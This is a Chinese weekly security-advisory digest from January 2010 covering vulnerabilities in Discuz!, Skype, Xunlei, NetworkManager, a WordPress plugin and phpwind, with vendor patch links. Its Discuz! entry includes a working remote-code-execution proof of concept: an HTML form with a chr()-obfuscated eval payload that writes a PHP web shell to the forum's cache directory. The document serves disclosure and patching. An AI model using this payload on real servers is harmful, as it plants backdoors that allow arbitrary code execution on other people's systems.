当前位置: 安全纵横 > 安全公告

一周业界安全动态(1月4日-1月10日)

来源:安恒信息 日期:2010-01

Discuz! 7.1 & 7.2 远程代码执行漏洞
受影响系统:
Discuz! 7.1 & 7.2
描述:
Comsenz Discuz!是一款流行的论坛程序。
Discuz!新版本7.1与7.2版本中的showmessage函数中eval中执行的参数未初始化,可以任意提交,从而可以执行任意PHP命令。
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
showmessage函数里$vars = explode(':', $message);然后message可以自己控制,于是就很容易了,参数是两个自定义的数组。
下面是HTML测试代码:
<form method="post" action="http://bbs.XXXX.com/misc.php" enctype="multipart/form-data">
帖子ID,指定一个存在的帖子即可:<input type="text" name="tid" value="1" />
<input type="hidden" name="action" value="imme_binding" />
<input type="hidden" name="response[result]" value="1:2" />
<input type="hidden" name="scriptlang[1][2]" value="${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).

chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).

chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(117).chr(115).chr(101).chr(114).chr(103).

chr(114).chr(111).chr(117).chr(112).chr(95).chr(48).chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).

chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).

chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).

chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}" />
<input type="submit" name="topicsubmit" value="提交" class="submit" />
</form>
forumdata/cache/usergroup_01.php ??cmd 生成的一句话
厂商补丁:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://download2.comsenz.com/Discuz/patch/7.1/
http://download2.comsenz.com/Discuz/patch/7.2/

 

Skype GUI HTML代码注入漏洞
受影响系统:
Skype Skype (Linux) 1.1.0.20
Skype Skype (Linux) 1.0.0.7
Skype Skype (Linux) 1.0.0.1
Skype Skype (Linux) 0.93.0.3
Skype Skype (Linux) 0.92.0.12
描述:
Skype是一款流行的P2P VoIP软件,可提供高质量的语音通讯服务。
Skype在处理来自用户的数据时存在输入验证漏洞,Skype未经验证检查就把用户数据用于构造输出到用户GUI,可能导致用户执行恶意脚本。
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.skype.com/

 

迅雷XPPlayer Activex控件远程溢出漏洞
受影响系统:
迅雷 5.9.14.1246
描述:
迅雷是一款流行的P2P下载工具。
迅雷所提供的XPPlayer ActiveX控件没有正确的过滤提供给DapFileSize、VodUrl等方法的输入参数,构建恶意网页并诱使用户访问就可以触发缓冲区溢出,导致执行任意代码。
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.xunlei.com/

 

NetworkManager绕过安全限制和信息泄露漏洞
受影响系统:
GNOME NetworkManager 0.7.2
描述:
NetworkManager是Linux和其他Unix类系统所使用的用于简化联网的软件工具。
NetworkManager没有确保在连接尝试的情况下为WPA Enterprise或802.1x网络所配置的CA证书文件仍存在,这允许远程攻击者通过伪造无线网络的身份获取敏感信息或中断连接。
在连接编辑器的GUI中执行操作时NetworkManager的nm-connection-editor可能会通过D-Bus导出连接对象,这允许本地用户通过读取D-Bus信号获得某些敏感信息。
厂商补丁:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://git.gnome.org/browse/network-manager-applet/commit/?h=NETWORKMANAGER_APPLET_0_7&id=4020594dfbf566f1852f0acb36ad631a9e73a82b

 

WordPress Events Calendar插件SQL注入漏洞
受影响系统:
WordPress Events Calendar 6.5.2.2
描述:
WP-Forum是一款基于PHP的WordPress插件。
WordPress所使用的Events Calendar插件没有正确地过滤提交给Events页面的event_id参数,远程攻击者可以通过提交恶意查询请求执行SQL注入攻击。
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://wordpress.org/

 

phpwind 7.5 apps/groups/index.php远程包含漏洞
受影响系统:
phpwind 7.5
描述:
Phpwind 是一款流行的论坛程序。
apps/groups/index.php 里$route和$basePath变量没有初始化,导致远程包含或者本地包含php文件,导致执行任意php代码。
厂商补丁:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.phpwind.net/read-htm-tid-914851.html